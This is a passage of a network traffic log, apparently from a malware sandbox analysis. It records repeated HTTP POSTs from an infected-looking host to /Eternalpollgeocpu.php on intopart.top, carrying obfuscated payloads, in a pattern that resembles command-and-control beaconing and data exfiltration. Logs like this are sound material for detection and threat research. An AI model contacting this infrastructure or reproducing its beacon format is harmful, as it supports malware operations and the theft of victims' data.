Apr 29, 2024 01:04:01.538602114 CEST	577	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CWQbgwzUa2K5WDTUm9isY8cmZUaK3ZKnXUdnq6a5opbpcoI7nxTVzIrEgP2syNYGidy8pOaH62d5SZ%2F0Md4LsSCKbGIIMVDLeS1Qa5ksyueJIveHIM7llvvdXm2S3yI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab05f78cf8737-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:01.538631916 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.4	49841	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:01.765672922 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:01.875602007 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:01.875768900 CEST	1080	OUT	Data Raw: 5d 58 5a 51 55 5d 5e 54 54 56 50 51 5a 55 51 5b 5b 53 5e 44 54 5f 50 42 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]XZQU]^TTVPQZUQ[[S^DT_PB]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'X2><!2\$>5/$$>92S?=R3#(/9\# :_$: Z/!Z/(
Apr 29, 2024 01:04:02.256828070 CEST	585	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=af05F2KPB4U7Ro2oYb6xyE94%2FvFjAL5pgS%2FdhzUEUR1OUCaOZR40cNuZzXiBnVLWaoAPM%2FEhrAtwDUQWiiU3RFM03Pa%2BK%2FbTElVZZFUlYc80phEBfe643f64fgBBbVE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0636bd460b8-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:02.256863117 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.4	49842	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:02.488981962 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:02.598855972 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:02.599033117 CEST	1080	OUT	Data Raw: 5d 5e 5a 59 50 5c 5e 53 54 56 50 51 5a 5f 51 5a 5b 5b 5e 49 54 5f 50 44 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]^ZYP\^STVPQZ_QZ[[^IT_PD]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'X2.8\!"X$-%/C0T$=>S?4$0;R-?"#*$: Z/!Z/
Apr 29, 2024 01:04:03.009771109 CEST	583	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g0Df9hEkkR3f4tLlwBB%2FB33yveELKSYZ3Ett%2BMh%2BfBOgI5S639wZqMf9moyfzE4686Dzk%2FaTWaTDSKncwSUgOfCoLs3x8g7sDAGiPbqhdUKdEQViUJUf1edAV1OG6uE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab067e96d1054-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:03.009799957 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.4	49843	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:03.246301889 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:03.356931925 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:03.357342958 CEST	1080	OUT	Data Raw: 58 5c 5a 58 55 5d 5b 50 54 56 50 51 5a 53 51 52 5b 58 5e 44 54 5d 50 44 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X\ZXU][PTVPQZSQR[X^DT]PD]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$2-0_#!'2=:/<U'- _):+[,$#(,5Z"0%3: Z/!Z/0
Apr 29, 2024 01:04:03.644119024 CEST	570	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bHXqfzaIxDSeNgS6MyvTaYJrjXJw8K19ZRgv4%2BORkxm3Fu8PQ2RhcUPQecg8Io5Fr7KtjMtpscYoNsPqw1BhzIJTUrONyueMB3QAhFOJHmp3vEbOld%2BRePj8l22VliQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab06caa2f2ae2-ORD alt-svc: h2=":443"; ma=60
Apr 29, 2024 01:04:03.644138098 CEST	9	IN	Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:03.644153118 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.4	49844	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:03.877373934 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:03.987341881 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:03.987478018 CEST	1080	OUT	Data Raw: 58 52 5f 58 55 5a 5b 53 54 56 50 51 5a 5e 51 51 5b 5f 5e 47 54 5d 50 42 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XR_XUZ[STVPQZ^QQ[_^GT]PB]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'['-0Z7Y$>9/5W$ *&<($3U;%7)0 Z/!Z/
Apr 29, 2024 01:04:04.384368896 CEST	583	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6EtHrxgk9jDi4zgB%2FJhragjL8KbcKnwLTfR4%2FpmSPTHbXiLfViEHyNFzBgpkUbV1KSTpCPGxZB6r2OM%2BUPiQ7tC5EYVx8JlaoRcwx4oi%2FiY2k4yXIAx7ZOaJCQPm7QI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0709f12617c-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:04.384398937 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.4	49845	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:04.610742092 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:04.721499920 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:04.721692085 CEST	1080	OUT	Data Raw: 5d 5e 5a 50 55 59 5e 52 54 56 50 51 5a 50 51 53 5b 5e 5e 48 54 52 50 49 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]^ZPUY^RTVPQZPQS[^^HTRPI]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$&-'#?&*;T$>8Y)::<=W33//&#U6\3 Z/!Z/<
Apr 29, 2024 01:04:05.011948109 CEST	585	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GckhHk2weGwT%2BdxH2q6LbyvOp9xG%2BmCK1K4mCpYrnXsc2gH%2FnnSjIZoTyglMPYPtqIwmKMjQNsD7ouo7eY9%2BWXrQlRKNTAEgl66jdQZAvirnvHJVTGoCS1fuyWF%2FhgE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0752f6829d8-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:05.011967897 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.4	49846	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:05.035499096 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1788 Expect: 100-continue
Apr 29, 2024 01:04:05.145749092 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:05.145884991 CEST	1788	OUT	Data Raw: 58 53 5a 51 50 59 5b 57 54 56 50 51 5a 57 51 52 5b 5e 5e 41 54 5f 50 47 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XSZQPY[WTVPQZWQR[^^AT_PG]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'1[$!"1-9,6('/()"S(3+V8/]406&: Z/!Z/
Apr 29, 2024 01:04:05.541260004 CEST	730	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AlgjHoEJnY1YEQ4akd8iEf0bajWVn2qXASCto5nv%2B8k7CvSpbQqF%2BfdJJVTNMElKbrcLJsJ74w9nbu5%2BhI7qjjfiP3oLQaGNS2yUJShA4gnRBAiPGA004kZgqHazQ28%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab077d8be61db-ORD alt-svc: h2=":443"; ma=60 Data Raw: 39 38 0d 0a 0e 12 23 02 2b 3b 0b 57 3d 32 39 09 33 21 2b 56 26 59 24 09 29 59 36 41 25 1d 20 5e 2d 3e 2d 0f 33 1a 27 03 23 17 06 5a 32 0f 27 1d 2b 0e 20 59 02 1c 39 08 32 00 22 58 25 10 3b 58 2b 1c 04 00 21 10 3f 04 3e 38 29 0b 27 01 07 14 3c 23 0c 5b 3c 39 0a 1e 2c 2e 2d 5f 25 34 27 1d 3c 25 2c 52 08 13 20 54 2b 0e 30 56 21 2b 34 0e 33 0b 3e 5e 27 25 24 08 22 5e 3c 1c 3c 07 0a 5d 30 32 29 05 31 0c 26 50 2c 33 3b 42 21 3c 3d 11 24 17 21 5c 2f 02 20 49 0f 34 5d 53 0d 0a Data Ascii: 98#+;W=293!+V&Y$)Y6A% ^->-3'#Z2'+ Y92"X%;X+!?>8)'<#[<9,.-_%4'<%,R T+0V!+43>^'%$"^<<]02)1&P,3;B!<=$!\/ I4]S
Apr 29, 2024 01:04:05.541279078 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
98	192.168.2.4	49847	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:05.248526096 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:05.358450890 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:05.358748913 CEST	1080	OUT	Data Raw: 58 59 5f 5c 55 5c 5b 51 54 56 50 51 5a 5e 51 53 5b 58 5e 46 54 5d 50 44 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XY_\U\[QTVPQZ^QS[X^FT]PD]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'&> 48X2>^;7'8[=:"T(.+V';V,?""090: Z/!Z/
Apr 29, 2024 01:04:05.757422924 CEST	583	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pTt4FSPuIWMf6jOwaNEK7ZSMwekIkfxEOMskKsm%2BS2TrIZURedqwKW6Nbs33rx%2Bji2%2BaOSCvHzGIDNtfGFhja8AdvspwnbQQLRdZFRhX%2Bz2qO2Lt0PfFhZPQ3qOLtjs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0792e9161a3-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:05.757441998 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.4	49848	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:05.984491110 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1076 Expect: 100-continue
Apr 29, 2024 01:04:06.094963074 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:06.095096111 CEST	1076	OUT	Data Raw: 58 5a 5a 59 55 5a 5b 51 54 56 50 51 5a 56 51 56 5b 5f 5e 41 54 59 50 44 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XZZYUZ[QTVPQZVQV[_^ATYPD]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'Y2-'!2Y&2,'-'2S(3',/,!Z4U:3 Z/!Z/0
Apr 29, 2024 01:04:06.495512962 CEST	581	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jwygkij2KSiLEzywE%2Bl%2FS7KbvjIiwH3TAgZOmj3QvrXGOJWgWQlAGAVuUo5p9mnJabbhydDPSSGkX6M7eNZwj4KMyHxkCmpgkGj%2B5PVzaf8ZnOI1d8UR78Ae9Lu3E1E%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab07dc89813e9-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:06.495558977 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.4	49849	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:06.724426985 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:06.834544897 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:06.834722996 CEST	1080	OUT	Data Raw: 5d 5a 5a 5d 55 5a 5b 57 54 56 50 51 5a 5f 51 57 5b 5a 5e 40 54 52 50 49 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]ZZ]UZ[WTVPQZ_QW[Z^@TRPI]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'27,2>2,'&.<Z>92S(=/S$08,Y%"0*&: Z/!Z/
Apr 29, 2024 01:04:07.119360924 CEST	574	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ahBeMUsUNT0iBj43ToceMlJLOcbHL8Imo%2BEPsuWObMwMUgVicIDq6RttER92ozlQSqJOUcj9%2FvBxBfKAz1v6Nw9XpqQSPCdzzC1L3%2BGF1eL%2FQnWhfy3M5JXtTR7SPvs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0826abc61bb-ORD alt-svc: h2=":443"; ma=60
Apr 29, 2024 01:04:07.119385004 CEST	14	IN	Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<ZYT0

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.4	49850	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:07.361618042 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:07.471734047 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:07.471844912 CEST	1080	OUT	Data Raw: 5d 5a 5a 5c 55 5b 5e 55 54 56 50 51 5a 52 51 5a 5b 5b 5e 40 54 59 50 44 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]ZZ\U[^UTVPQZRQZ[[^@TYPD]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'Y2?7'&.],3$>$[*9&V+$+V/9##9$: Z/!Z/4
Apr 29, 2024 01:04:07.863656998 CEST	583	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OToJavG2mQkDOhuTNXCr%2FqKOOohRlnjCMjJANw1sc5aE1Z0LrZGskdgHm4FmiJ%2FI0ZJYUlFlPTrtlnZj6zpIDFxmxD2Skt4H9tltknH%2B%2BTsRGKHBS33Fq5F3WTERw5I%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0866ffb6363-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:07.863677979 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.4	49851	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:08.097338915 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:08.207310915 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:08.207504988 CEST	1080	OUT	Data Raw: 58 58 5a 59 55 58 5e 53 54 56 50 51 5a 54 51 54 5b 58 5e 43 54 53 50 49 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XXZYUX^STVPQZTQT[X^CTSPI]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$&-Z7$%=5[/%?0'>91+[,0,Y""#6' Z/!Z/,
Apr 29, 2024 01:04:08.592755079 CEST	583	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1SNfhXEMl6h%2FFWxe14eJK8t6TLj5i7MvdadH4zvePXmzuRAD6FVtF8yJtyTUZN%2FQTNSA51p94CH%2BOV0ZiQjHh0E9qxGSiKmOzMzIU9k5zzL4GTM9a%2Fe7qHhwNp6J7Hg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab08afa1e620e-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:08.592776060 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.4	49852	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
